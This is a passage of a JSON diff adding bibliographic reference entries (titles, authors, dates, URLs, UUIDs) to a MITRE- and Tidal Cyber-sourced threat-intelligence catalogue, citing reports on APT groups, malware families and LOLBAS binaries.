"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" + ], + "source": "MITRE", + "title": "APT28 Under the Scope" + }, + "related": [], + "uuid": "3dd67aae-7feb-4b07-a985-ccadc1b16f1d", + "value": "Bitdefender APT28 Dec 2015" + }, + { + "description": "Matthew Dunwoody. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved November 20, 2017.", + "meta": { + "date_accessed": "2017-11-20T00:00:00Z", + "date_published": "2017-03-27T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" + ], + "source": "MITRE", + "title": "APT29 Domain Fronting With TOR" + }, + "related": [], + "uuid": "1d919991-bc87-41bf-9e58-edf1b3806bb8", + "value": "FireEye APT29 Domain Fronting With TOR March 2017" + }, + { + "description": "Dunwoody, M. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved March 27, 2017.", + "meta": { + "date_accessed": "2017-03-27T00:00:00Z", + "date_published": "2017-03-27T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" + ], + "source": "MITRE", + "title": "APT29 Domain Fronting With TOR" + }, + "related": [], + "uuid": "3e013b07-deaf-4387-acd7-2d0565d196a9", + "value": "FireEye APT29 Domain Fronting" + }, + { + "description": "FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.", + "meta": { + "date_accessed": "2015-05-01T00:00:00Z", + "date_published": "2015-04-01T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION" + }, + "related": [], + "uuid": "c48d2084-61cf-4e86-8072-01e5d2de8416", + "value": "FireEye APT30" + }, + { + "description": "Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2020-10-27T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online" + ], + "source": "MITRE", + "title": "APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services" + }, + "related": [], + "uuid": "1647c9a6-e475-4a9a-a202-0133dbeef9a0", + "value": "Zscaler APT31 Covid-19 October 2020" + }, + { + "description": "Phil Stokes. (2020, December 2). APT32 Multi-stage macOS Trojan Innovates on Crimeware Scripting Technique. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2020-12-02T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/" + ], + "source": "MITRE", + "title": "APT32 Multi-stage macOS Trojan Innovates on Crimeware Scripting Technique" + }, + "related": [], + "uuid": "d31dcbe6-06ec-475e-b121-fd25a93c3ef7", + "value": "sentinelone apt32 macOS backdoor 2020" + }, + { + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-09-21T00:00:00Z", + "refs": [ + "https://www.brighttalk.com/webcast/10703/275683" + ], + "source": "MITRE", + "title": "APT33: New Insights into Iranian Cyber Espionage Group" + }, + "related": [], + "uuid": "9b378592-5737-403d-8a07-27077f5b2d61", + "value": "FireEye APT33 Webinar Sept 2017" + }, + { + "description": "Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-19T00:00:00Z", + "refs": [ + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east" + ], + "source": "MITRE", + "title": "APT34 - New Targeted Attack in the Middle East" + }, + "related": [], + "uuid": "4eef7032-de14-44a2-a403-82aefdc85c50", + "value": "FireEye APT34 Webinar Dec 2017" + }, + { + "description": "DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.", + "meta": { + "date_accessed": "2022-05-25T00:00:00Z", + "date_published": "2022-03-21T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell" + ], + "source": "MITRE", + "title": "APT35 Automates Initial Access Using ProxyShell" + }, + "related": [], + "uuid": "1837e917-d80b-4632-a1ca-c70d4b712ac7", + "value": "DFIR Report APT35 ProxyShell March 2022" + }, + { + "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.", + "meta": { + "date_accessed": "2022-01-24T00:00:00Z", + "date_published": "2022-01-11T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" + ], + "source": "MITRE", + "title": "APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit" + }, + "related": [], + "uuid": "81dce660-93ea-42a4-902f-0c6021d30f59", + "value": "Check Point APT35 CharmPower January 2022" + }, + { + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "meta": { + "date_accessed": "2018-03-01T00:00:00Z", + "date_published": "2018-02-20T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT37 (Reaper): The Overlooked North Korean Actor" + }, + "related": [], + "uuid": "4d575c1a-4ff9-49ce-97cd-f9d0637c2271", + "value": "FireEye APT37 Feb 2018" + }, + { + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "meta": { + "date_accessed": "2018-11-06T00:00:00Z", + "date_published": "2018-10-03T00:00:00Z", + "refs": [ + "https://content.fireeye.com/apt/rpt-apt38" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT38: Un-usual Suspects" + }, + "related": [], + "uuid": "7c916329-af56-4723-820c-ef932a6e3409", + "value": "FireEye APT38 Oct 2018" + }, + { + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.", + "meta": { + "date_accessed": "2019-02-19T00:00:00Z", + "date_published": "2019-01-29T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + ], + "source": "MITRE", + "title": "APT39: An Iranian Cyber Espionage Group Focused on Personal Information" + }, + "related": [], + "uuid": "ba366cfc-cc04-41a5-903b-a7bb73136bc3", + "value": "FireEye APT39 Jan 2019" + }, + { + "description": "Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.", + "meta": { + "date_accessed": "2018-01-16T00:00:00Z", + "date_published": "2017-09-01T00:00:00Z", + "refs": [ + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf" + ], + "source": "MITRE", + "title": "APT3 Adversary Emulation Plan" + }, + "related": [], + "uuid": "64c01921-c33f-402e-b30d-a2ba26583a24", + "value": "APT3 Adversary Emulation Plan" + }, + { + "description": "Yates, M. (2017, June 18). APT3 Uncovered: The code evolution of Pirpi. Retrieved September 28, 2017.", + "meta": { + "date_accessed": "2017-09-28T00:00:00Z", + "date_published": "2017-06-18T00:00:00Z", + "refs": [ + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf" + ], + "source": "MITRE", + "title": "APT3 Uncovered: The code evolution of Pirpi" + }, + "related": [], + "uuid": "9c8bd493-bf08-431b-9d53-29eb14a6eef5", + "value": "evolution of pirpi" + }, + { + "description": "Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.", + "meta": { + "date_accessed": "2019-03-18T00:00:00Z", + "date_published": "2019-03-04T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html" + ], + "source": "MITRE", + "title": "APT40: Examining a China-Nexus Espionage Actor" + }, + "related": [], + "uuid": "8a44368f-3348-4817-aca7-81bfaca5ae6d", + "value": "FireEye APT40 March 2019" + }, + { + "description": "Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.", + "meta": { + "date_accessed": "2022-09-16T00:00:00Z", + "refs": [ + "https://www.mandiant.com/media/17826" + ], + "source": "MITRE", + "title": "APT42: Crooked Charms, Cons and Compromise" + }, + "related": [], + "uuid": "10b3e476-a0c5-41fd-8cb8-5bfb245b118f", + "value": "Mandiant APT42" + }, + { + "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.", + "meta": { + "date_accessed": "2020-05-05T00:00:00Z", + "date_published": "2019-02-18T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations" + }, + "related": [], + "uuid": "cae075ea-42cb-4695-ac66-9187241393d1", + "value": "QiAnXin APT-C-36 Feb2019" + }, + { + "description": "kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.", + "meta": { + "date_accessed": "2020-11-20T00:00:00Z", + "date_published": "2020-09-25T00:00:00Z", + "refs": [ + "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign" + }, + "related": [], + "uuid": "682c843d-1bb8-4f30-9d2e-35e8d41b1976", + "value": "360 Machete Sep 2020" + }, + { + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.", + "meta": { + "date_accessed": "2020-08-24T00:00:00Z", + "date_published": "2020-04-15T00:00:00Z", + "refs": [ + "https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf" + ], + "source": "MITRE", + "title": "APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors" + }, + "related": [], + "uuid": "a5a14a4e-2214-44ab-9067-75429409d744", + "value": "Cycraft Chimera April 2020" + }, + { + "description": "CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.", + "meta": { + "date_accessed": "2020-11-16T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers" + ], + "source": "MITRE", + "title": "APTs Targeting IT Service Provider Customers" + }, + "related": [], + "uuid": "b8bee7f9-155e-4765-9492-01182e4435b7", + "value": "CISA IT Service Providers" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "date_published": "2016-02-08T00:00:00Z", + "refs": [ + "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks" + }, + "related": [], + "uuid": "1f07f234-50f0-4c1e-942a-a01d3f733161", + "value": "Securelist GCMAN" + }, + { + "description": "Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-04-27T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts" + ], + "source": "MITRE, Tidal Cyber", + "title": "APT Targets Financial Analysts with CVE-2017-0199" + }, + "related": [], + "uuid": "dabad6df-1e31-4c16-9217-e079f2493b02", + "value": "Proofpoint TA459 April 2017" + }, + { + "description": "Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021.", + "meta": { + "date_accessed": "2021-01-27T00:00:00Z", + "date_published": "2018-04-12T00:00:00Z", + "refs": [ + "https://securelist.com/apt-trends-report-q1-2018/85280/" + ], + "source": "MITRE", + "title": "APT Trends report Q1 2018" + }, + "related": [], + "uuid": "587f5195-e696-4a3c-8c85-90b9c002cd11", + "value": "Securelist APT Trends April 2018" + }, + { + "description": "Global Research and Analysis Team. (2020, April 30). APT trends report Q1 2020. Retrieved September 19, 2022.", + "meta": { + "date_accessed": "2022-09-19T00:00:00Z", + "date_published": "2020-04-30T00:00:00Z", + "refs": [ + "https://securelist.com/apt-trends-report-q1-2020/96826/" + ], + "source": "MITRE", + "title": "APT trends report Q1 2020" + }, + "related": [], + "uuid": "23c91719-5ebe-4d03-8018-df1809fffd2f", + "value": "Kaspersky APT Trends Q1 2020" + }, + { + "description": "GReAT . (2021, April 27). APT trends report Q1 2021. Retrieved June 6, 2022.", + "meta": { + "date_accessed": "2022-06-06T00:00:00Z", + "date_published": "2021-04-27T00:00:00Z", + "refs": [ + "https://securelist.com/apt-trends-report-q1-2021/101967" + ], + "source": "MITRE", + "title": "APT trends report Q1 2021" + }, + "related": [], + "uuid": "3fd0ba3b-7919-46d3-a444-50508603956f", + "value": "Kaspersky APT Trends Q1 April 2021" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-08-08T00:00:00Z", + "refs": [ + "https://securelist.com/apt-trends-report-q2-2017/79332/" + ], + "source": "MITRE", + "title": "APT Trends report Q2 2017" + }, + "related": [], + "uuid": "fe28042c-d289-463f-9ece-1a75a70b966e", + "value": "Securelist APT Trends Q2 2017" + }, + { + "description": "Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2018-04-02T00:00:00Z", + "refs": [ + "https://wald0.com/?p=179" + ], + "source": "MITRE", + "title": "A Red Teamer’s Guide to GPOs and OUs" + }, + "related": [], + "uuid": "48bb84ac-56c8-4840-9a11-2cc76213e24e", + "value": "Wald0 Guide to GPOs" + }, + { + "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", + "meta": { + "date_accessed": "2014-11-13T00:00:00Z", + "date_published": "2011-08-08T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion" + ], + "source": "MITRE", + "title": "Are MBR Infections Back in Fashion? (Infographic)" + }, + "related": [], + "uuid": "fa809aab-5051-4f9c-8e27-b5989608b03c", + "value": "Lau 2011" + }, + { + "description": "Brian Krebs. (2016, October 27). Are the Days of “Booter” Services Numbered?. Retrieved May 15, 2017.", + "meta": { + "date_accessed": "2017-05-15T00:00:00Z", + "date_published": "2016-10-27T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + ], + "source": "MITRE", + "title": "Are the Days of “Booter” Services Numbered?" + }, + "related": [], + "uuid": "d29a88ae-273b-439e-8808-dc9931f1ff72", + "value": "Krebs-Booter" + }, + { + "description": "Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2017-08-14T00:00:00Z", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe" + ], + "source": "MITRE", + "title": "Are you looking out for forfiles.exe (if you are watching for cmd.exe)" + }, + "related": [], + "uuid": "923d6d3e-6117-43a5-92c6-ea0c131355c2", + "value": "RSA Forfiles Aug 2017" + }, + { + "description": "Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.", + "meta": { + "date_accessed": "2017-10-04T00:00:00Z", + "date_published": "2017-07-20T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html" + ], + "source": "MITRE", + "title": "Are you Ready to Respond? (Webinar)" + }, + "related": [], + "uuid": "e7091d66-7faa-49d6-b16f-be1f79db4471", + "value": "FireEye Respond Webinar July 2017" + }, + { + "description": "Microsoft. (n.d.). Arp. Retrieved April 17, 2016.", + "meta": { + "date_accessed": "2016-04-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490864.aspx" + ], + "source": "MITRE", + "title": "Arp" + }, + "related": [], + "uuid": "7714222e-8046-4884-b460-493d9ef46305", + "value": "TechNet Arp" + }, + { + "description": "King, J., Lauerman, K. (2016, January 22). ARP Poisoning (Man-in-the-Middle) Attack and Mitigation Technique. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "2016-01-22T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html" + ], + "source": "MITRE", + "title": "ARP Poisoning (Man-in-the-Middle) Attack and Mitigation Technique" + }, + "related": [], + "uuid": "715cd044-f5ef-4cad-8741-308d104f05a5", + "value": "Cisco ARP Poisoning Mitigation 2016" + }, + { + "description": "ASEC. (2017). ASEC REPORT VOL.88. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf" + ], + "source": "MITRE", + "title": "ASEC REPORT VOL.88" + }, + "related": [], + "uuid": "a02e3bbf-5864-4ccf-8b6f-5f8452395670", + "value": "ASEC Emotet 2017" + }, + { + "description": "ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2015-08-01T00:00:00Z", + "refs": [ + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" + ], + "source": "MITRE", + "title": "ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger" + }, + "related": [], + "uuid": "a8f323c7-82bc-46e6-bd6c-0b631abc644a", + "value": "ASERT Seven Pointed Dagger Aug 2015" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.", + "meta": { + "date_accessed": "2018-11-27T00:00:00Z", + "date_published": "2018-02-20T00:00:00Z", + "refs": [ + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + ], + "source": "MITRE", + "title": "A Slice of 2017 Sofacy Activity" + }, + "related": [], + "uuid": "3a043bba-2451-4765-946b-c1f3bf4aea36", + "value": "Securelist Sofacy Feb 2018" + }, + { + "description": "THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2019-09-02T00:00:00Z", + "refs": [ + "https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6" + ], + "source": "MITRE", + "title": "A sobering day" + }, + "related": [], + "uuid": "5a01f0b7-86f7-44a1-bf35-46a631402ceb", + "value": "THE FINANCIAL TIMES LTD 2019." + }, + { + "description": "LOLBAS. (2021, September 26). Aspnet_Compiler.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/" + ], + "source": "Tidal Cyber", + "title": "Aspnet_Compiler.exe" + }, + "related": [], + "uuid": "15864c56-115e-4163-b816-03bdb9bfd5c5", + "value": "Aspnet_Compiler.exe - LOLBAS Project" + }, + { + "description": "Mandiant. (2020, April 27). Assembling the Russian Nesting Doll: UNC2452 Merged into APT29. Retrieved March 26, 2023.", + "meta": { + "date_accessed": "2023-03-26T00:00:00Z", + "date_published": "2020-04-27T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29" + ], + "source": "MITRE", + "title": "Assembling the Russian Nesting Doll: UNC2452 Merged into APT29" + }, + "related": [], + "uuid": "5276508c-6792-56be-b757-e4b495ef6c37", + "value": "Mandiant UNC2452 APT29 April 2022" + }, + { + "description": "Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.", + "meta": { + "date_accessed": "2018-08-07T00:00:00Z", + "date_published": "2017-10-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/administration/windows-commands/assoc" + ], + "source": "MITRE", + "title": "assoc" + }, + "related": [], + "uuid": "63fb65d7-6423-42de-b868-37fbc2bc133d", + "value": "Microsoft Assoc Oct 2017" + }, + { + "description": "Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2018-08-08T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration" + ], + "source": "MITRE", + "title": "Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’" + }, + "related": [], + "uuid": "f403fc54-bdac-415a-9cc0-78803dd84214", + "value": "Rhino Security Labs Enumerating AWS Roles" + }, + { + "description": "Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2019-02-13T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research" + ], + "source": "MITRE", + "title": "ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA" + }, + "related": [], + "uuid": "eb4dc1f8-c6e7-4d6c-9258-b03a0ae64d2e", + "value": "Cybereason Astaroth Feb 2019" + }, + { + "description": "Miller, Sarah. (2023, February 2). A surge of malvertising across Google Ads is distributing dangerous malware. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2023-02-02T00:00:00Z", + "refs": [ + "https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/" + ], + "source": "MITRE", + "title": "A surge of malvertising across Google Ads is distributing dangerous malware" + }, + "related": [], + "uuid": "15a4d429-28c3-52be-aeb8-d94ad2743866", + "value": "spamhaus-malvertising" + }, + { + "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.", + "meta": { + "date_accessed": "2017-12-08T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx" + ], + "source": "MITRE", + "title": "Asynchronous Procedure Calls" + }, + "related": [], + "uuid": "37f1ef6c-fc0e-4e47-85ab-20d53caba77e", + "value": "Microsoft APC" + }, + { + "description": "Microsoft. (n.d.). At. Retrieved April 28, 2016.", + "meta": { + "date_accessed": "2016-04-28T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490866.aspx" + ], + "source": "MITRE", + "title": "At" + }, + "related": [], + "uuid": "31b40c09-d68f-4889-b585-c077bd9cef28", + "value": "TechNet At" + }, + { + "description": "Thomas Koenig. (n.d.). at(1) - Linux man page. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "refs": [ + "https://linux.die.net/man/1/at" + ], + "source": "MITRE", + "title": "at(1) - Linux man page" + }, + "related": [], + "uuid": "4bc1389d-9586-4dfc-a67c-58c6d3f6796a", + "value": "Die.net Linux at Man Page" + }, + { + "description": "IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.", + "meta": { + "date_accessed": "2022-02-25T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man1/at.1p.html" + ], + "source": "MITRE", + "title": "at(1p) — Linux manual page" + }, + "related": [], + "uuid": "3e3a84bc-ab6d-460d-8abc-cafae6eaaedd", + "value": "Linux at" + }, + { + "description": "Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox & CVE-2015-3113. Retrieved March 30, 2016.", + "meta": { + "date_accessed": "2016-03-30T00:00:00Z", + "date_published": "2015-07-25T00:00:00Z", + "refs": [ + "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html" + ], + "source": "MITRE", + "title": "A tale of Pirpi, Scanbox & CVE-2015-3113" + }, + "related": [], + "uuid": "4904261a-a3a9-4c3e-b6a7-079890026ee2", + "value": "PWC Pirpi Scanbox" + }, + { + "description": "LOLBAS. (2018, May 25). Atbroker.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/" + ], + "source": "Tidal Cyber", + "title": "Atbroker.exe" + }, + "related": [], + "uuid": "b0c21b56-6591-49c3-8e67-328ddb7b436d", + "value": "Atbroker.exe - LOLBAS Project" + }, + { + "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.", + "meta": { + "date_accessed": "2020-05-06T00:00:00Z", + "date_published": "2019-10-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf" + ], + "source": "MITRE", + "title": "AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM" + }, + "related": [], + "uuid": "fdd57c56-d989-4a6f-8cc5-5b3713605dec", + "value": "ESET Attor Oct 2019" + }, + { + "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2017-05-16T00:00:00Z", + "refs": [ + "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/" + ], + "source": "MITRE", + "title": "A Technical Analysis of WannaCry Ransomware" + }, + "related": [], + "uuid": "305d0742-154a-44af-8686-c6d8bd7f8636", + "value": "LogRhythm WannaCry" + }, + { + "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2015-11-04T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/" + ], + "source": "MITRE", + "title": "A Technical Look At Dyreza" + }, + "related": [], + "uuid": "0a5719f2-8a88-44e2-81c5-2d16a39f1f8d", + "value": "Malwarebytes Dyreza November 2015" + }, + { + "description": "LOLBAS. (2019, September 20). At.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-09-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/At/" + ], + "source": "Tidal Cyber", + "title": "At.exe" + }, + "related": [], + "uuid": "a31e1f5c-9b8d-4af4-875b-5c03d2400c12", + "value": "At.exe - LOLBAS Project" + }, + { + "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.", + "meta": { + "date_accessed": "2017-12-08T00:00:00Z", + "date_published": "2016-10-27T00:00:00Z", + "refs": [ + "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows" + ], + "source": "MITRE", + "title": "ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS" + }, + "related": [], + "uuid": "9282dbab-391c-4ffd-ada9-1687413b686b", + "value": "ENSIL AtomBombing Oct 2016" + }, + { + "description": "Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2018-06-07T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html" + ], + "source": "MITRE", + "title": "A Totally Tubular Treatise on TRITON and TriStation" + }, + "related": [], + "uuid": "bfa5886a-a7f4-40d1-98d0-c3358abcf265", + "value": "FireEye TRITON 2018" + }, + { + "description": "The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out. Retrieved June 15, 2023.", + "meta": { + "date_accessed": "2023-06-15T00:00:00Z", + "date_published": "2023-06-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/" + ], + "source": "Tidal Cyber", + "title": "A Truly Graceful Wipe Out" + 